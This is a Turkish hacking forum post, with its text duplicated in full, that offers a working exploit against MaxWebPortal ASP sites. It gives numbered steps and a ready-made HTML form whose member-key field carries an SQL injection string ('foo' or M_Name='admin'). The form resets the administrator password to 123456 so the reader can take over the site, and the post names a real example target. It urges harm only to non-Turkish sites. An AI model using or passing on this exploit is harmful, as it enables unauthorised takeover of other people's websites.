blackwolf
uid=0(root)
- Katılım
- 17 Ağu 2005
- Mesajlar
- 1,429
- Reaction score
- 0
- Puanları
- 0
- Yaş
- 35
Yöntem: Exploit attack
Kısaca geçiyorum..asp mi php mi daha güvenli bilmiyorum ama
yönetimini ele gecirdigim sitelerin sayısında
asp siteler hep önde gidiyor.işte size örnek bi site..
http://www.ncbbw.com/portal
nasıl bir açıgı mı vardı..?site max web portal scriptiydi ve acık kapanmamıstı.
işte yöntemi...
1. not defterinizi açın.
2. aşagıdakini aynen kopyala yapıştır yapın.
3. portalın adresini xxxxx yazan yere yazın
mesela www.nyCWave.com gibi..
4. şimdi not defterini farklı kaydet yaparak html olarak kaydedin.
5. htlm ’yi açın.ve submit tusuna basın işte bu kadar.sitede eger
acık kapanmadıysa admin şifresi 123456 olacak
6. admin 123456 yaptıktan sonra site elinizde.
7. bu açık sayısı sitelerde hızla kapanıyor.
<form action="http://XXXXX/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo’ or M_Name=’admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
Not:Türk sitelerine zarar vermeyin ama..
Kısaca geçiyorum..asp mi php mi daha güvenli bilmiyorum ama
yönetimini ele gecirdigim sitelerin sayısında
asp siteler hep önde gidiyor.işte size örnek bi site..
http://www.ncbbw.com/portal
nasıl bir açıgı mı vardı..?site max web portal scriptiydi ve acık kapanmamıstı.
işte yöntemi...
1. not defterinizi açın.
2. aşagıdakini aynen kopyala yapıştır yapın.
3. portalın adresini xxxxx yazan yere yazın
mesela www.nyCWave.com gibi..
4. şimdi not defterini farklı kaydet yaparak html olarak kaydedin.
5. htlm ’yi açın.ve submit tusuna basın işte bu kadar.sitede eger
acık kapanmadıysa admin şifresi 123456 olacak
6. admin 123456 yaptıktan sonra site elinizde.
7. bu açık sayısı sitelerde hızla kapanıyor.
<form action="http://XXXXX/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo’ or M_Name=’admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
Not:Türk sitelerine zarar vermeyin ama..